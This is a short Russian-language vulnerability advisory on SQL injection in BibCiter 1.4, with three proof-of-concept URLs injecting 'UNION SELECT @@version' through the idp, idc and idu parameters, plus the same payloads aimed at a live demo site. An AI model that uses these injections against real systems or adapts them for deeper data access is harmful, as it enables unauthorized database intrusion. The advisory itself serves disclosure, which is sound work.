• Партнер

  • Программа: BibCiter 1.4

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
    команды в базе данных приложения. Уязвимость существует из-за недостаточной
    обработки входных данных сценариями projects.php, contacts.php и users.php.
    Удаленный пользователь может с помощью специально сформированного запроса
    выполнить произвольные SQL команды в базе данных приложения.

    Эксплоит:

    http://localhost/[path]/projects.php?idp=-721) UNION SELECT @@version%23
    http://localhost/[path]/contacts.php?idc=-1) UNION SELECT @@version%23
    http://localhost/[path]/users.php?idu=-1) UNION SELECT @@version%23

    Демонстрация:

    http://bibciter.net/demo/reports/projects.php?idp=-721)%20UNION%20SELECT%20@@version%23
    http://bibciter.net/demo/reports/contacts.php?idc=-1)%20UNION%20SELECT%20@@version%23
    http://bibciter.net/demo/reports/users.php?idu=-1)%20UNION%20SELECT%20@@version%23

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии